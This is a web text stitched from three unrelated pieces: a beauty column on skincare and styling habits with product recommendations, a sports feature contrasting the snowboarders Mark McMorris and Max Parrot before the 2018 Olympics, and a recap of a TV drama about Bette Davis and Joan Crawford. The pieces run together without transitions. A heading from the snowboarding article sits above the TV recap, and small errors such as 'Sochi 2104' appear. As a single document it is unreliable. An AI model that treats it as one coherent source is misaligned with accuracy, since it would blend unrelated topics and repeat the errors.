It’s a catchy phrase that’s inspired movies aplenty, and one that I’ve recently realised could also be applied to many of my most long-standing skincare and make-up habits. Despite being someone who should know better, my ablutions are littered with “beauty frenemies” – there’s so much I do because it’s quick, easy or I’ve always done it, but which could never be described as best practice. Take heat-styling, for example. My blow-dry skills leave a lot to be desired, so I can’t resist a pair of straightening irons to smooth things over after I’ve blasted the moisture out of my hair. It’s quick, easy and looks great but any appliance that reaches temperatures of over 150° degrees is going to cause damage. There are two options: either embrace the waves – which, let’s be honest, I won’t be doing any time soon – or spritz thoroughly with a heat protection spray before starting a styling session. Tresemmé Keratin Smooth Heat Protection Shine Spray (£7.29; nationwide) prevents damage, locks in moisture and is a bargain. That way you can keep your frenemy close without worry. Then there are gel manicures, which I can’t live without. While my sister perfected the art of painting her nails during her teens (she’s particularly ambidextrous so far better equipped than most of us), my attempts are so shoddy it looks like I’ve allowed my toddler to give me a manicure. This is why I am addicted to salon applications of CND Shellac. With a shelf life of about three weeks, you can let the professionals do the hard work and it is dry before you have paid. Yes, chip-free polish is a brilliant thing, but I rarely return to the salon to have it soaked and filed away, instead peeling it off while watching telly and losing layers of nail in the process. The solution? Investing in a lifetime supply of SensatioNail Gel Polish Remover (£6; 0345 070 8090, boots.com), an acetone that lets you soak away your polish at home when it starts to look shabby. Wipes really are the “Mean Girls” of the beauty world, luring you in only to stab you in the back once you let your guard down. They’re quick, easy and when you’re ready to collapse at the end of the day the idea of being able to cleanse in bed is oh-so-enticing. But this is one frenemy we should definitely live without. It may feel like the low-maintenance option but the truth is they don’t thoroughly remove the day, and sometimes simply smear it around – and that’s before we talk about how bad they are for the environment (surprisingly, many are made of plastic so aren’t even slightly biodegradeable). There’s no alternative to a decent cleansing routine, so I just need to kiss these goodbye for good. As for our relationship with spots, yes, we know we’re supposed to stop before we pop, but who can resist when you have a zit staring back at you in the mirror… Squeezing is so pleasing in the moment but this quick fix can spread bacteria, cause scarring and drive the problem deeper under the skin. Despite my best intentions, I’m never going to be someone who is able to ignore a breakout, but following with a dab of Origins Blemish Treatment Gel (£15.50; 0800 054 2888, origins.co.uk) should contain things nicely. It uses the fruit extract saw palmetto, which has antiseptic properties and can help control excess oil production to prevent pimples. Another frenemy of anyone with problem skin is the type of face wash designed for acne – these transform in days but can actually aggravate the issue in the long term. Anything too harsh strips skin of natural oils, causing sebum production to go into overdrive and creating a vicious circle of lumps and bumps. If your skin feels tight after cleansing, the product has been overzealous in its actions. As a twenty-something I suffered from adult acne which only disappeared after I switched from antiseptic washes to Dermalogica Ultracalming Cleanser (£32; 0800 917 7147, dermalogica.co.uk), which helps repair the natural barrier to help sensitised skin protect itself from environmental aggressors. Finally, while I’ve never been a fake tanner myself, I know many women battle a love/hate relationship every summer. Modern formulations mean that streaks and smells are largely a thing of the past – and no one will quibble about its transformative effect on wobbly bits and body confidence – but there’s still the irritating issue of uneven fade. After a few showers, limbs have lost their tawny hue but knees, elbows and other edges cling to their colour tenaciously. The solution is already in your kitchen cupboard. All it takes is a couple of tablespoons of baking soda mixed to a paste with water. Massage in, wait a few minutes and shower it – and those annoying patches – down the drain. Mark McMorris and Max Parrot aren’t exactly rivals, but they’re not best friends either. The Canadians are two of of the world’s best snowboarders, and both are medal favourites heading into the 2018 Winter Olympics in Pyeongchang, South Korea. But that’s just about where the similarities between the two end, according to McMorris. “He takes more of the gymnast approach and doesn’t ride big mountain stuff or doesn’t really spend his time going to film for projects or go heli-boarding and do stuff like that,” McMorris says about the 23-year-old from Bromont, Que. “He’s more on the trampoline or on an airbag and then hitting the jumps and stuff.” “So not my cup of tea and not the snowboarder I really love to watch, but he’s damn good at doing flips and landing at the right times.” Parrot doesn’t shy away from this approach to snowboarding, saying it gives him an opportunity to hone his skills year-round. “We all have different ways of preparing ourselves and training ourselves,” Parrot says. “When you go out on the mountain, you take the chairlift, you do maybe, in a day, I would say 15 jumps. But on a trampoline you can do 15 jumps in less than a minute.” Good Times with Craig McMorris2:56 “McMorris has been a gymnast as well. He has done trampoline since he was very young,” Parrot says about his 23-year-old counterpart from Regina. “Maybe he stopped now because, you know, in snowboarding [if] you’re doing trampolining it’s not known as something cool, so I think he just stopped that for his image or maybe he does it secretly, I don’t know. “Maybe he doesn’t even need it. Like I said, there’s many other ways to be good at snowboarding, but I personally think [the trampoline is] a very, very great place to learn new tricks. Especially in a safe way.” Safety has been a major part of the discussion surrounding McMorris this year after he sustained near-fatal injuries while backcountry snowboarding in British Columbia in March. “I’ve had to talk about the injury probably every time I’ve talked to anybody that has any recollection of what I’ve done, because that seems to be the talking point over the last six months for me,” McMorris says. “I feel like I’m past it and have overcome it and just want to move on to new things and get competing so I can talk to people about that. “I feel like I’m mentally past it and very close to being physically past it.” He certainly looked like his usual self in his return to the World Cup circuit on Nov. 25 in Beijing, winning the big air event with three impressive jumps. Big air will make its Olympic debut in February, and both McMorris and Parrot — who wasn’t in Beijing — have already qualified for the Games. Mark McMorris puts world on notice with Big Air gold in Beijing1:51 Both snowboarders competed in slopestyle at the Sochi 2104 Olympics, with McMorris winning bronze and Parrot placing fifth. Since those Games, the duo have been mainstays on X Games and World Cup podiums in both events, with Parrot taking things to new heights by landing the first-ever quad underflip to secure X Games gold in Aspen in January. “A quad is a very good trick. When you do it you have a lot of chances to win, that’s for sure. But the problem is we don’t have a big jump to do quads at every contest,” Parrot says, adding that the jump in Aspen is the only one big enough for it at the moment. “I don’t even think at the Olympics we’ll have a jump big enough to do quads, so I would say I’m putting my energy right now more into other tricks that are possible on every jump.” Max Parrot wins gold at X Games0:41 That suits McMorris just fine, who told CBC Sports’s Jacqueline Doorey after Parrot’s gold-winning quad that the trick “scared the living beep” out of him. “I don’t think I’ll ever try that trick in any other circumstance than in a competition when I need to. It’s just one of those tricks that isn’t necessarily like the best time. It’s just really scary,” McMorris said after earning bronze at that event. There’s a unique dynamic within Olympic snowboarding, where your biggest competitor may be marching right beside you in the parade of nations. Differences aside, there is a mutual respect between McMorris and Parrot. “Max as a competitor is really, really great. He does consistently well pretty much all the time,” McMorris says. “He’s a very, very talented snowboarder,” Parrot says of McMorris. “He has won many, many medals over the past years. “I wouldn’t say I’m best friends with him, but, we’re friends and there’s not any rivalry I would say.” However, underneath that level of mutual recognition there are personal and philosophical differences between the two that clearly separate them. McMorris attributes it to “a different vibe between the two of us.” “I didn’t get into snowboarding trying to go to the Olympics or trying to be the best competitive snowboarder. I just got into snowboarding because I loved riding with my friends and being a snowboarder,” McMorris says, adding that “being respected in the community” is as important as winning international competitions. “I don’t really have these conversations with [Parrot], but if you watch anything that he’s been a part of it’s like ‘I wanted to be a pro snowboarder and I wanted to win medals’ and that’s his take. I love winning and that makes me feel great, but I don’t necessarily sacrifice my snowboarding image just for medals.” Parrot, who says he doesn’t backcountry snowboard but may try it after his competitive career ends, is comfortable with his approach and confident about why he does it. “Snowboarding has evolved so much since I’d say five, six years [ago] that now it’s kind of getting hard to do backcountry, filming, so much other stuff and be still concentrated on winning the contests,” he says. “So I just focus my energy all on contests and I think it’s working pretty well. “What I love about snowboarding is that you can always push the limits.”

‘A different vibe’
No, obviously, that wasn’t the end. In fact, the cease-fire only lasted about as long as it took either actress to finish off a vodka rocks. What brought the curtain down on the Baby Jane co-stars’ detente? Read on…
‘PACK THE BAGS OF THE GIRL NEXT DOOR’| As “The Other Woman” began, Joan noticed that the ingenue who’d been cast as the Hudson sisters’ neighbor was turning heads on the set. As if that alone didn’t doom the starlet, she told Crawford that her grandma had been a big fan. When Bob refused to can the young bombshell, Joan suggested to Bette that the girl might “pull focus” — especially once their womanizing director started sleeping with her. Next thing we knew, Bette was siding with Joan, barking at Bob that he was “casting with the wrong head” and threatening to call in sick until the kid was pink-slipped. Clearly, the rivals could have been — and for that one shining moment were — a formidable tag team.
Alas, it seemed that Hollywood remained as determined as ever to cast the twosome as enemies. In the ’40s, Jack had signed Joan to Warner just to send Bette a message: “You’re not the only bitch in the kennel.” And, during the shooting of Baby Jane, he informed Bob that he was so pleased with the dailies that he was going to open the picture wide… that is, if its director would generate buzz by keeping its leading ladies at one another’s throats. On one hand, Bob didn’t want to. On the other, it would break up what he likened to the “Hitler/Stalin pact” that was making life hell for him on the set. Hearing this, wife Harriet pointed out that there were rumors that he was cheating on her. Not true, he proclaimed. “But,” she replied pointedly, “it hurts just the same” — something that he should consider before spreading gossip himself!
‘I HOPE DIGNITY PAYS YOUR GAS BILL’| Over lunch with Hedda, who was hoping for “red meat, not pabulum,” Bob refused to dish on his stars, prompting the gossipmonger to scoff that he was no John Ford, for that director had known how to play the game. Finally, Bob caved, nauseating himself by offering up a blind item about how distracting Bette found Joan’s falsies. As soon as Crawford read the column, she, of course, saw red and, regrettably, played right into her director’s hands, allowing him to sell her on the idea that “I am the only opinion that matters.” Moreover, Joan then rang up Hedda’s rival Louella Parsons to give her an on-the-record rebuttal, in which she said — and asked to be quoted as saying — “Miss Davis looks old enough to be my mother.”
Right on cue, Bette hit the roof and threatened Joan that she’d “steal this picture right out from under [her] nose.” Delighted by the “pure, naked rancor” he was seeing on screen, Jack wanted more — and he wanted Bob to get it by making each star think he liked the other better. Tragically, that was a piece of cake. Bette was already insecure about her performance and wondered if it really was brave or merely her attempt to bury her nemesis. “I don’t want to end up a joke,” she told Bob, who reassured her during a rather intimate “I’ve Written a Letter to Daddy” run-through that he wouldn’t let that happen. In response to talk of Bette’s private rehearsals with Bob, Joan tearfully phoned him in the middle of the night to say that she wanted to quit Baby Jane because loverboy Peter had left her over it. When Bob arrived at Chez Crawford, Joan — with whom the cad had had a fling during the making of Autumn Leaves — tried to no avail to rekindle that old flame. Worse, Peter walked in, inadvertently exposing her lie about their breakup (which she then made truth by kicking him to the curb).
‘ANYTHING TO GET AWAY FROM YOU AND YOUR SADNESS’| Later, when Hedda showed up at Joan’s ticked that she’d given the rival columnist an exclusive, Crawford said that she’d only done so to get her gal pal’s attention. Truth was, Joan confided off the record, she was $ 2 million in debt, thanks to her late husband, and desperately needed to work for a few more years to get her kids through school. Not to worry, Hedda said. Another Oscar ought to buy her that time — and, since Hedda’s was the only opinion that mattered, she should be able to get one for her friend.
Meanwhile, on the set, Bette met her Baby Jane leading man Victor Buono (Dominic Burgess), who rightly guessed that she’d expected someone “thinner, less homosexual,” and pitched a fit when B.D. attracted the attention of all the grips. When Bette, in a huff, told her daughter she was sending her to Maine for the rest of the summer, B.D. accused her not only of being jealous but of having not gracefully stepped aside like other actresses when her turn on the carousel was over. Distraught, Bette called Bob, who, upon arriving at her doorstep, couldn’t imagine what she needed that couldn’t wait till morning. “A friend,” replied a tearful Bette. Not that Bob was much of a friend. He took advantage of her vulnerability, kissing her as we faded to black, then climbed into bed with Harriet just in time to get up for work the following morning.
